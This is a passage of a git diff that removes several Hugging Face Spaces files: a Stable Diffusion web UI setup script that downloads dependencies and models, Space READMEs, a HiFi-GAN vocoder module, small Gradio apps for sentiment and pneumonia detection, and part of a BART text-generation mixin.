configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/Lykon/NeverEnding-Dream-webui/app.py b/spaces/Lykon/NeverEnding-Dream-webui/app.py deleted file mode 100644 index c4b5de0d1ac307c8c03ee4c48b4a3760fad264cf..0000000000000000000000000000000000000000 --- a/spaces/Lykon/NeverEnding-Dream-webui/app.py +++ /dev/null @@ -1,72 +0,0 @@ -import os -from subprocess import getoutput - -gpu_info = getoutput('nvidia-smi') -if("A10G" in gpu_info): - os.system(f"pip install -q https://github.com/camenduru/stable-diffusion-webui-colab/releases/download/0.0.15/xformers-0.0.15.dev0+4c06c79.d20221205-cp38-cp38-linux_x86_64.whl") -elif("T4" in gpu_info): - os.system(f"pip install -q https://github.com/camenduru/stable-diffusion-webui-colab/releases/download/0.0.15/xformers-0.0.15.dev0+1515f77.d20221130-cp38-cp38-linux_x86_64.whl") - -os.system(f"git clone -b v1.5 https://github.com/camenduru/stable-diffusion-webui /home/user/app/stable-diffusion-webui") -os.chdir("/home/user/app/stable-diffusion-webui") - -os.system(f"wget -q https://github.com/camenduru/webui/raw/main/env_patch.py -O /home/user/app/env_patch.py") -os.system(f"sed -i '$a fastapi==0.90.0' /home/user/app/stable-diffusion-webui/requirements_versions.txt") -os.system(f"sed -i -e '/import image_from_url_text/r /home/user/app/env_patch.py' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e '/(modelmerger_interface, \"Checkpoint Merger\", \"modelmerger\"),/d' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e '/(train_interface, \"Train\", \"ti\"),/d' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e '/extensions_interface, \"Extensions\", \"extensions\"/d' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e '/settings_interface, \"Settings\", \"settings\"/d' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f'''sed -i -e "s/document.getElementsByTagName('gradio-app')\[0\].shadowRoot/!!document.getElementsByTagName('gradio-app')[0].shadowRoot ? 
document.getElementsByTagName('gradio-app')[0].shadowRoot : document/g" /home/user/app/stable-diffusion-webui/script.js''') -os.system(f"sed -i -e 's/ show_progress=False,/ show_progress=True,/g' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e 's/shared.demo.launch/shared.demo.queue().launch/g' /home/user/app/stable-diffusion-webui/webui.py") -os.system(f"sed -i -e 's/ outputs=\[/queue=False, &/g' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e 's/ queue=False, / /g' /home/user/app/stable-diffusion-webui/modules/ui.py") - - -if "IS_SHARED_UI" in os.environ: - os.system(f"rm -rfv /home/user/app/stable-diffusion-webui/scripts/") - - os.system(f"wget -q https://github.com/camenduru/webui/raw/main/shared-config.json -O /home/user/app/shared-config.json") - os.system(f"wget -q https://github.com/camenduru/webui/raw/main/shared-ui-config.json -O /home/user/app/shared-ui-config.json") - - # os.system(f"wget -q https://huggingface.co/ckpt/anything-v3-vae-swapped/resolve/main/anything-v3-vae-swapped.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/anything-v3-vae-swapped.ckpt") - # os.system(f"wget -q {os.getenv('MODEL_LINK')} -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/{os.getenv('MODEL_NAME')}") - # os.system(f"wget -q {os.getenv('VAE_LINK')} -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/{os.getenv('VAE_NAME')}") - # os.system(f"wget -q {os.getenv('YAML_LINK')} -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/{os.getenv('YAML_NAME')}") - os.system(f"wget -q https://huggingface.co/Lykon/DreamShaper/resolve/main/DreamShaper_3.3_baked_vae.safetensors -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/DreamShaper_3.3_baked_vae.safetensors") - os.system(f"wget -q https://huggingface.co/Lykon/DreamShaper/resolve/main/Dreamshaper_3.32_baked_vae_clip_fix.safetensors -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/Dreamshaper_3.32_baked_vae_clip_fix.safetensors") - - os.system(f"python launch.py --force-enable-xformers --disable-console-progressbars --enable-console-prompts --ui-config-file /home/user/app/shared-ui-config.json --ui-settings-file /home/user/app/shared-config.json --cors-allow-origins huggingface.co,hf.space --no-progressbar-hiding") -else: - # Please duplicate this space and delete # character in front of the custom script you want to use or add here more custom scripts with same structure os.system(f"wget -q https://CUSTOM_SCRIPT_URL -O /home/user/app/stable-diffusion-webui/scripts/CUSTOM_SCRIPT_NAME.py") - os.system(f"wget -q https://gist.github.com/camenduru/9ec5f8141db9902e375967e93250860f/raw/d0bcf01786f20107c329c03f8968584ee67be12a/run_n_times.py -O /home/user/app/stable-diffusion-webui/scripts/run_n_times.py") - - # Please duplicate this space and delete # character in front of the extension you want to use or add here more extensions with same structure os.system(f"git clone https://EXTENSION_GIT_URL /home/user/app/stable-diffusion-webui/extensions/EXTENSION_NAME") - #os.system(f"git clone https://github.com/camenduru/stable-diffusion-webui-artists-to-study /home/user/app/stable-diffusion-webui/extensions/stable-diffusion-webui-artists-to-study") - os.system(f"git clone https://github.com/yfszzx/stable-diffusion-webui-images-browser /home/user/app/stable-diffusion-webui/extensions/stable-diffusion-webui-images-browser") - os.system(f"git clone https://github.com/camenduru/deforum-for-automatic1111-webui 
/home/user/app/stable-diffusion-webui/extensions/deforum-for-automatic1111-webui") - - # Please duplicate this space and delete # character in front of the model you want to use or add here more ckpts with same structure os.system(f"wget -q https://CKPT_URL -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/CKPT_NAME.ckpt") - #os.system(f"wget -q https://huggingface.co/nitrosocke/Arcane-Diffusion/resolve/main/arcane-diffusion-v3.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/arcane-diffusion-v3.ckpt") - #os.system(f"wget -q https://huggingface.co/DGSpitzer/Cyberpunk-Anime-Diffusion/resolve/main/Cyberpunk-Anime-Diffusion.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/Cyberpunk-Anime-Diffusion.ckpt") - #os.system(f"wget -q https://huggingface.co/prompthero/midjourney-v4-diffusion/resolve/main/mdjrny-v4.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/mdjrny-v4.ckpt") - #os.system(f"wget -q https://huggingface.co/nitrosocke/mo-di-diffusion/resolve/main/moDi-v1-pruned.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/moDi-v1-pruned.ckpt") - #os.system(f"wget -q https://huggingface.co/Fictiverse/Stable_Diffusion_PaperCut_Model/resolve/main/PaperCut_v1.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/PaperCut_v1.ckpt") - #os.system(f"wget -q https://huggingface.co/lilpotat/sa/resolve/main/samdoesarts_style.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/samdoesarts_style.ckpt") - #os.system(f"wget -q https://huggingface.co/hakurei/waifu-diffusion-v1-3/resolve/main/wd-v1-3-float32.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/wd-v1-3-float32.ckpt") - #os.system(f"wget -q https://huggingface.co/CompVis/stable-diffusion-v-1-4-original/resolve/main/sd-v1-4.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/sd-v1-4.ckpt") - #os.system(f"wget -q https://huggingface.co/runwayml/stable-diffusion-v1-5/resolve/main/v1-5-pruned-emaonly.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/v1-5-pruned-emaonly.ckpt") - #os.system(f"wget -q https://huggingface.co/runwayml/stable-diffusion-inpainting/resolve/main/sd-v1-5-inpainting.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/sd-v1-5-inpainting.ckpt") - - #os.system(f"wget -q https://huggingface.co/Linaqruf/anything-v3.0/resolve/main/Anything-V3.0-pruned.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/Anything-V3.0-pruned.ckpt") - #os.system(f"wget -q https://huggingface.co/Linaqruf/anything-v3.0/resolve/main/Anything-V3.0.vae.pt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/Anything-V3.0-pruned.vae.pt") - - #os.system(f"wget -q https://huggingface.co/stabilityai/stable-diffusion-2/resolve/main/768-v-ema.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/768-v-ema.ckpt") - #os.system(f"wget -q https://raw.githubusercontent.com/Stability-AI/stablediffusion/main/configs/stable-diffusion/v2-inference-v.yaml -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/768-v-ema.yaml") - - os.system(f"wget -q https://huggingface.co/Lykon/NeverEnding-Dream/resolve/main/NeverEndingDream_1.22_BakedVae_fp16.safetensors -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/NeverEndingDream_1.22_BakedVae_fp16.safetensors") - os.system(f"wget -q https://huggingface.co/Lykon/NeverEnding-Dream/resolve/main/NeverEndingDream_ft_mse.safetensors -O 
/home/user/app/stable-diffusion-webui/models/Stable-diffusion/NeverEndingDream_ft_mse.safetensors") - - os.system(f"python launch.py --precision full --no-half --use-cpu SD BSRGAN ESRGAN SCUNet CodeFormer --all --ui-config-file /home/user/app/ui-config.json --ui-settings-file /home/user/app/config.json --disable-console-progressbars --enable-console-prompts --cors-allow-origins huggingface.co,hf.space --no-progressbar-hiding --api --skip-torch-cuda-test") - \ No newline at end of file diff --git a/spaces/MJ/AI-ChatBot/README.md b/spaces/MJ/AI-ChatBot/README.md deleted file mode 100644 index 263cdb1e57769f469d043974ca68b3c418bf08b1..0000000000000000000000000000000000000000 --- a/spaces/MJ/AI-ChatBot/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: AI ChatBot -emoji: 🏆 -colorFrom: blue -colorTo: gray -sdk: gradio -sdk_version: 3.33.1 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/Manjushri/SDXL-1.0/README.md b/spaces/Manjushri/SDXL-1.0/README.md deleted file mode 100644 index a6e9553078c41b0c222816b76e44ae522ee883c5..0000000000000000000000000000000000000000 --- a/spaces/Manjushri/SDXL-1.0/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: SDXL-1.0 -emoji: ⚡ -colorFrom: green -colorTo: indigo -sdk: gradio -sdk_version: 3.35.2 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/Manmay/tortoise-tts/tortoise/models/hifigan_decoder.py b/spaces/Manmay/tortoise-tts/tortoise/models/hifigan_decoder.py deleted file mode 100644 index 17bdf890b5bf398743a96eaf77dec90fb6a33edd..0000000000000000000000000000000000000000 --- a/spaces/Manmay/tortoise-tts/tortoise/models/hifigan_decoder.py +++ /dev/null @@ -1,302 +0,0 @@ -# adopted from https://github.com/jik876/hifi-gan/blob/master/models.py -import torch -from torch import nn -from torch.nn import Conv1d, ConvTranspose1d -from torch.nn import functional as F -from torch.nn.utils import remove_weight_norm, weight_norm - -LRELU_SLOPE = 0.1 - - -def get_padding(k, d): - return int((k * d - d) / 2) - - -class ResBlock1(torch.nn.Module): - """Residual Block Type 1. It has 3 convolutional layers in each convolutional block. - - Network:: - - x -> lrelu -> conv1_1 -> conv1_2 -> conv1_3 -> z -> lrelu -> conv2_1 -> conv2_2 -> conv2_3 -> o -> + -> o - |--------------------------------------------------------------------------------------------------| - - - Args: - channels (int): number of hidden channels for the convolutional layers. - kernel_size (int): size of the convolution filter in each layer. - dilations (list): list of dilation value for each conv layer in a block. 
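-
-        Each dilated convolution is padded with `get_padding(kernel_size, dilation)` = (k * d - d) // 2, so the
-        temporal length is preserved and the residual additions stay shape-compatible.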
- """ - - def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)): - super().__init__() - self.convs1 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]), - ) - ), - ] - ) - - self.convs2 = nn.ModuleList( - [ - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - ] - ) - - def forward(self, x): - """ - Args: - x (Tensor): input tensor. - Returns: - Tensor: output tensor. - Shapes: - x: [B, C, T] - """ - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - xt = c2(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - """Residual Block Type 2. It has 1 convolutional layers in each convolutional block. - - Network:: - - x -> lrelu -> conv1-> -> z -> lrelu -> conv2-> o -> + -> o - |---------------------------------------------------| - - - Args: - channels (int): number of hidden channels for the convolutional layers. - kernel_size (int): size of the convolution filter in each layer. - dilations (list): list of dilation value for each conv layer in a block. - """ - - def __init__(self, channels, kernel_size=3, dilation=(1, 3)): - super().__init__() - self.convs = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - ] - ) - - def forward(self, x): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class HifiganGenerator(torch.nn.Module): - def __init__( - self, - in_channels, - out_channels, - resblock_type, - resblock_dilation_sizes, - resblock_kernel_sizes, - upsample_kernel_sizes, - upsample_initial_channel, - upsample_factors, - inference_padding=5, - cond_channels=0, - conv_pre_weight_norm=True, - conv_post_weight_norm=True, - conv_post_bias=True, - ): - r"""HiFiGAN Generator with Multi-Receptive Field Fusion (MRF) - - Network: - x -> lrelu -> upsampling_layer -> resblock1_k1x1 -> z1 -> + -> z_sum / #resblocks -> lrelu -> conv_post_7x1 -> tanh -> o - .. -> zI ---| - resblockN_kNx1 -> zN ---' - - Args: - in_channels (int): number of input tensor channels. - out_channels (int): number of output tensor channels. - resblock_type (str): type of the `ResBlock`. '1' or '2'. - resblock_dilation_sizes (List[List[int]]): list of dilation values in each layer of a `ResBlock`. - resblock_kernel_sizes (List[int]): list of kernel sizes for each `ResBlock`. 
- upsample_kernel_sizes (List[int]): list of kernel sizes for each transposed convolution. - upsample_initial_channel (int): number of channels for the first upsampling layer. This is divided by 2 - for each consecutive upsampling layer. - upsample_factors (List[int]): upsampling factors (stride) for each upsampling layer. - inference_padding (int): constant padding applied to the input at inference time. Defaults to 5. - """ - super().__init__() - self.inference_padding = inference_padding - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_factors) - # initial upsampling layers - self.conv_pre = weight_norm(Conv1d(in_channels, upsample_initial_channel, 7, 1, padding=3)) - resblock = ResBlock1 if resblock_type == "1" else ResBlock2 - # upsampling layers - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_factors, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - # MRF blocks - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for _, (k, d) in enumerate(zip(resblock_kernel_sizes, resblock_dilation_sizes)): - self.resblocks.append(resblock(ch, k, d)) - # post convolution layer - self.conv_post = weight_norm(Conv1d(ch, out_channels, 7, 1, padding=3, bias=conv_post_bias)) - if cond_channels > 0: - self.cond_layer = nn.Conv1d(cond_channels, upsample_initial_channel, 1) - - if not conv_pre_weight_norm: - remove_weight_norm(self.conv_pre) - - if not conv_post_weight_norm: - remove_weight_norm(self.conv_post) - - self.device = torch.device('cuda' if torch.cuda.is_available() else'cpu') - if torch.backends.mps.is_available(): - self.device = torch.device('mps') - def forward(self, x, g=None): - """ - Args: - x (Tensor): feature input tensor. - g (Tensor): global conditioning input tensor. - - Returns: - Tensor: output waveform. - - Shapes: - x: [B, C, T] - Tensor: [B, 1, T] - """ - o = self.conv_pre(x) - if hasattr(self, "cond_layer"): - o = o + self.cond_layer(g) - for i in range(self.num_upsamples): - o = F.leaky_relu(o, LRELU_SLOPE) - o = self.ups[i](o) - z_sum = None - for j in range(self.num_kernels): - if z_sum is None: - z_sum = self.resblocks[i * self.num_kernels + j](o) - else: - z_sum += self.resblocks[i * self.num_kernels + j](o) - o = z_sum / self.num_kernels - o = F.leaky_relu(o) - o = self.conv_post(o) - o = torch.tanh(o) - return o - - @torch.no_grad() - def inference(self, c, g=None): - """ - Args: - x (Tensor): conditioning input tensor. - - Returns: - Tensor: output waveform. 
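-
-            Note: the conditioning input `c` is upsampled along the time axis (scale factors 1024/256 and
-            24000/22050) before being passed through `forward`.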
- - Shapes: - x: [B, C, T] - Tensor: [B, 1, T] - """ - # c = c.to(self.conv_pre.weight.device) - # c = torch.nn.functional.pad(c, (self.inference_padding, self.inference_padding), "replicate") - up_1 = torch.nn.functional.interpolate( - c.transpose(1,2), - scale_factor=[1024 / 256], - mode="linear", - ) - up_2 = torch.nn.functional.interpolate( - up_1, - scale_factor=[24000 / 22050], - mode="linear", - ) - g = g.unsqueeze(0) - return self.forward(up_2.to(self.device), g.transpose(1,2)) - - def remove_weight_norm(self): - print("Removing weight norm...") - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - remove_weight_norm(self.conv_pre) - remove_weight_norm(self.conv_post) diff --git a/spaces/Margaret/mazzuma-sentiment-engine/app.py b/spaces/Margaret/mazzuma-sentiment-engine/app.py deleted file mode 100644 index bacb6b6a7efa14cdf7bac075a43f50a5090a1055..0000000000000000000000000000000000000000 --- a/spaces/Margaret/mazzuma-sentiment-engine/app.py +++ /dev/null @@ -1,16 +0,0 @@ -import gradio as gr - -from transformers import pipeline - -pipe = pipeline("sentiment-analysis", model="cardiffnlp/twitter-roberta-base-sentiment-latest") - -def get_sentiment(input_text): - return pipe(input_text)[0]["label"] - -iface = gr.Interface(fn = get_sentiment, - inputs = "text", - outputs = 'text', - title= 'Sentiment Analysis', - description = 'Get Sentiment Negative/Positive/Neutral for the given input') - -iface.launch(enable_queue=True) \ No newline at end of file diff --git a/spaces/Menna2211/Text-Image/README.md b/spaces/Menna2211/Text-Image/README.md deleted file mode 100644 index 6a2154fd6e571473d1d0e828c759e86201e445fd..0000000000000000000000000000000000000000 --- a/spaces/Menna2211/Text-Image/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Text Image -emoji: 🚀 -colorFrom: pink -colorTo: indigo -sdk: streamlit -sdk_version: 1.21.0 -app_file: Home.py -pinned: false ---- - -# TxT-Img diff --git a/spaces/MikoProduction/PneumoniaDetector/app.py b/spaces/MikoProduction/PneumoniaDetector/app.py deleted file mode 100644 index 8c3c17a5f7388f2a2f8ef1e8490c8da39a982d06..0000000000000000000000000000000000000000 --- a/spaces/MikoProduction/PneumoniaDetector/app.py +++ /dev/null @@ -1,77 +0,0 @@ -# 1. Imports and class names setup # -import gradio as gr -import os -import torch -from PIL import Image - -from model import ResNet101 -from timeit import default_timer as timer -from typing import Tuple, Dict - -# setup class names -class_names = ["normal", "pneumonia"] - -# 2. Model and transforms preparation # -model = ResNet101() - -# Load save weights -model.load_state_dict(torch.load(f="resnet101_pneumonia.pt", - map_location=torch.device("cpu"))) -model_transforms = model.transforms() - - -# 3. Predict function # - -# Create predict function - -def predict(img) -> Tuple[Dict, float]: - """ - Transforms and performs a prediction on img and returns prediction and time taken. 
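-
-    The model emits a single sigmoid probability for the "pneumonia" class; the "normal" score is reported as its
-    complement (1 - p).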
- :param img: PIL image - :return: prediction and time taken - """ - # start the timer - start_time = timer() - - # transform target image and add batch dimension - img = model_transforms(img.convert("RGB")).unsqueeze(0) - - # put model into evaluation mode and turn on inference mode - model.eval() - with torch.inference_mode(): - # pass the transformed image through the model - # and turn the prediction logits into prediction probabilities - pred_probs = torch.sigmoid(model(img)) - - # create a prediction label and prediction probability for each class - pred_labels_and_probs = {class_names[0]: round(1 - float(pred_probs[0]), 4), - class_names[1]: round(float(pred_probs[0]), 4)} - - # calculate the prediction time - pred_time = round(timer() - start_time, 5) - - # return the prediction dictionary and prediction time - return pred_labels_and_probs, pred_time - - -# 4. Gradio app # - -# Create title, description and article strings -title = "PneumoniaDetector 👁" -description = "A ResNet101 feature extractor computer vision model to detect pneumonia" -article = "Please add chest X-Ray image" - -# create examples list from "examples/" directory -example_list = [["examples/" + example] for example in os.listdir("examples")] - -# create the Gradio demo -demo = gr.Interface(fn=predict, - inputs=gr.Image(type="pil"), - outputs=[gr.Label(num_top_classes=1, label="Predictions"), - gr.Number(label="Prediction time (s)")], - examples=example_list, - title=title, - description=description, - article=article) - -demo.launch() diff --git a/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/detectors/panet.py b/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/detectors/panet.py deleted file mode 100644 index 135ee1e9af33e8207286d4990bd513dfd441176e..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/detectors/panet.py +++ /dev/null @@ -1,12 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from mmocr.registry import MODELS -from .single_stage_text_detector import SingleStageTextDetector - - -@MODELS.register_module() -class PANet(SingleStageTextDetector): - """The class for implementing PANet text detector: - - Efficient and Accurate Arbitrary-Shaped Text Detection with Pixel - Aggregation Network [https://arxiv.org/abs/1908.05900]. 
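-
-    The class adds no logic of its own; all training and inference behavior is inherited from
-    `SingleStageTextDetector`.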
- """ diff --git a/spaces/MrVicente/RA-BART/custom_bart/bart_generation_mixin.py b/spaces/MrVicente/RA-BART/custom_bart/bart_generation_mixin.py deleted file mode 100644 index 2a8d26ab1edc8ab3827ad10764bab3593c6d763c..0000000000000000000000000000000000000000 --- a/spaces/MrVicente/RA-BART/custom_bart/bart_generation_mixin.py +++ /dev/null @@ -1,3272 +0,0 @@ -import inspect -import warnings -from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union - -import torch -import torch.distributed as dist -from torch import nn - -from transformers.generation_beam_constraints import Constraint, DisjunctiveConstraint, PhrasalConstraint -from transformers.generation_beam_search import BeamScorer, BeamSearchScorer, ConstrainedBeamSearchScorer -from transformers.generation_logits_process import ( - EncoderNoRepeatNGramLogitsProcessor, - ExponentialDecayLengthPenalty, - ForcedBOSTokenLogitsProcessor, - ForcedEOSTokenLogitsProcessor, - HammingDiversityLogitsProcessor, - InfNanRemoveLogitsProcessor, - LogitNormalization, - LogitsProcessorList, - MinLengthLogitsProcessor, - NoBadWordsLogitsProcessor, - NoRepeatNGramLogitsProcessor, - PrefixConstrainedLogitsProcessor, - RepetitionPenaltyLogitsProcessor, - TemperatureLogitsWarper, - TopKLogitsWarper, - TopPLogitsWarper, - TypicalLogitsWarper, -) -from transformers.generation_stopping_criteria import ( - MaxLengthCriteria, - MaxTimeCriteria, - StoppingCriteria, - StoppingCriteriaList, - validate_stopping_criteria, -) -from transformers.pytorch_utils import torch_int_div -from transformers.utils import ModelOutput - -from transformers.generation_utils import ( - SampleOutput, - BeamSearchOutput, - BeamSampleOutput, - GreedySearchOutput, GreedySearchDecoderOnlyOutput, SampleDecoderOnlyOutput, GreedySearchEncoderDecoderOutput, - BeamSearchDecoderOnlyOutput, BeamSearchEncoderDecoderOutput, BeamSampleDecoderOnlyOutput, - BeamSampleEncoderDecoderOutput, SampleEncoderDecoderOutput, -) -from utils import get_jump_chunks -from torch.nn.utils.rnn import pad_sequence - -class GenerationMixin: - """ - A class containing all functions for auto-regressive text generation, to be used as a mixin in [`PreTrainedModel`]. - - The class exposes [`~generation_utils.GenerationMixin.generate`], which can be used for: - - *greedy decoding* by calling [`~generation_utils.GenerationMixin.greedy_search`] if `num_beams=1` and - `do_sample=False`. - - *multinomial sampling* by calling [`~generation_utils.GenerationMixin.sample`] if `num_beams=1` and - `do_sample=True`. - - *beam-search decoding* by calling [`~generation_utils.GenerationMixin.beam_search`] if `num_beams>1` and - `do_sample=False`. - - *beam-search multinomial sampling* by calling [`~generation_utils.GenerationMixin.beam_sample`] if - `num_beams>1` and `do_sample=True`. - - *diverse beam-search decoding* by calling [`~generation_utils.GenerationMixin.group_beam_search`], if - `num_beams>1` and `num_beam_groups>1`. - - *constrained beam-search decoding* by calling [`~generation_utils.GenerationMixin.constrained_beam_search`], - if `constraints!=None` or `force_words_ids!=None`. - """ - - def _prepare_model_inputs( - self, - inputs: Optional[torch.Tensor] = None, - bos_token_id: Optional[int] = None, - model_kwargs: Optional[Dict[str, torch.Tensor]] = None, - ) -> Tuple[torch.Tensor, Optional[str], Dict[str, torch.Tensor]]: - """ - This function extracts the model-specific `inputs` for generation. - """ - # 1. retrieve all kwargs that are non-None or non-model input related. 
-        # some encoder-decoder models have different names for model and encoder
-        if (
-            self.config.is_encoder_decoder
-            and hasattr(self, "encoder")
-            and self.encoder.main_input_name != self.main_input_name
-        ):
-            input_name = self.encoder.main_input_name
-        else:
-            input_name = self.main_input_name
-
-        model_kwargs = {k: v for k, v in model_kwargs.items() if v is not None or k != input_name}
-
-        # 2. check whether model_input_name is passed as kwarg
-        # if yes and `inputs` is None use kwarg inputs
-        inputs_kwarg = model_kwargs.pop(input_name, None)
-        if inputs_kwarg is not None and inputs is not None:
-            raise ValueError(
-                f"`inputs`: {inputs} were passed alongside "
-                f"{input_name} which is not allowed. "
-                f"Make sure to either pass {inputs} or {input_name}=..."
-            )
-        elif inputs_kwarg is not None:
-            inputs = inputs_kwarg
-
-        # 3. models with `input_ids` can also make use of `inputs_embeds`
-        if self._can_retrieve_inputs_from_name(inputs, "inputs_embeds", model_kwargs):
-            inputs, input_name = model_kwargs["inputs_embeds"], "inputs_embeds"
-
-        # 4. Only encoder-decoder models can have non `input_ids` input format
-        if not self.config.is_encoder_decoder and input_name != "input_ids":
-            raise ValueError(
-                f"If {input_name} is passed as model-specific keyword "
-                "input then model has to be an encoder-decoder and not a "
-                f"{self.__class__.__name__}."
-            )
-
-        # 5. if `inputs` is still None, try to create `input_ids` from BOS token
-        if inputs is None:
-            inputs = self._prepare_input_ids_for_generation(bos_token_id, model_kwargs.get("encoder_outputs"))
-
-        return inputs, input_name, model_kwargs
-
-    def _can_retrieve_inputs_from_name(
-        self, inputs: Optional[torch.Tensor], name: str, model_kwargs: Dict[str, torch.Tensor]
-    ) -> bool:
-        """
-        If `inputs` is None and `name` appears both in the forward signature and in the keyword arguments, the
-        inputs can be retrieved from `name`.
-        """
-        can_retrieve_inputs = model_kwargs.get(name, None) is not None and name in set(
-            inspect.signature(self.forward).parameters.keys()
-        )
-
-        if can_retrieve_inputs and inputs is not None:
-            raise ValueError(f"Can only pass one of {name} and {self.main_input_name}")
-
-        return can_retrieve_inputs
-
-    def prepare_inputs_for_generation(self, input_ids: torch.LongTensor, **kwargs) -> Dict[str, Any]:
-        """
-        Implement in subclasses of [`PreTrainedModel`] for custom behavior to prepare inputs in the generate method.
-        """
-        return {"input_ids": input_ids}
-
-    def adjust_logits_during_generation(self, logits: torch.FloatTensor, **kwargs) -> torch.FloatTensor:
-        """
-        Implement in subclasses of [`PreTrainedModel`] for custom behavior to adjust the logits in the generate method.
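-
-        The base implementation is a no-op and returns `logits` unchanged.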
- """ - return logits - - def _prepare_input_ids_for_generation( - self, bos_token_id: Optional[int], encoder_outputs: Optional[ModelOutput] - ) -> torch.LongTensor: - if self.config.is_encoder_decoder and encoder_outputs is not None: - # make dummy input_ids with value -100, as a sanity check ensuring that they won't be used for encoding - shape = encoder_outputs.last_hidden_state.size()[:-1] - return torch.ones(shape, dtype=torch.long, device=self.device) * -100 - - if bos_token_id is None: - raise ValueError("`bos_token_id` has to be defined when no `input_ids` are provided.") - return torch.ones((1, 1), dtype=torch.long, device=self.device) * bos_token_id - - def _prepare_attention_mask_for_generation( - self, - inputs: torch.Tensor, - pad_token_id: int, - eos_token_id: int, - ) -> torch.LongTensor: - is_input_ids = len(inputs.shape) == 2 and inputs.dtype in [torch.int, torch.long] - is_pad_token_in_inputs = (pad_token_id is not None) and (pad_token_id in inputs) - is_pad_token_not_equal_to_eos_token_id = (eos_token_id is None) or ( - (eos_token_id is not None) and (pad_token_id != eos_token_id) - ) - # Check if input is input_ids and padded -> only then is attention_mask defined - if is_input_ids and is_pad_token_in_inputs and is_pad_token_not_equal_to_eos_token_id: - return inputs.ne(pad_token_id).long() - else: - return torch.ones(inputs.shape[:2], dtype=torch.long, device=inputs.device) - - def _prepare_encoder_decoder_kwargs_for_generation( - self, inputs_tensor: torch.Tensor, model_kwargs, model_input_name: Optional[str] = None - ) -> Dict[str, Any]: - # 1. get encoder - encoder = self.get_encoder() - - # 2. prepare encoder args and encoder kwargs from model kwargs - irrelevant_prefix = ["decoder_", "cross_attn", 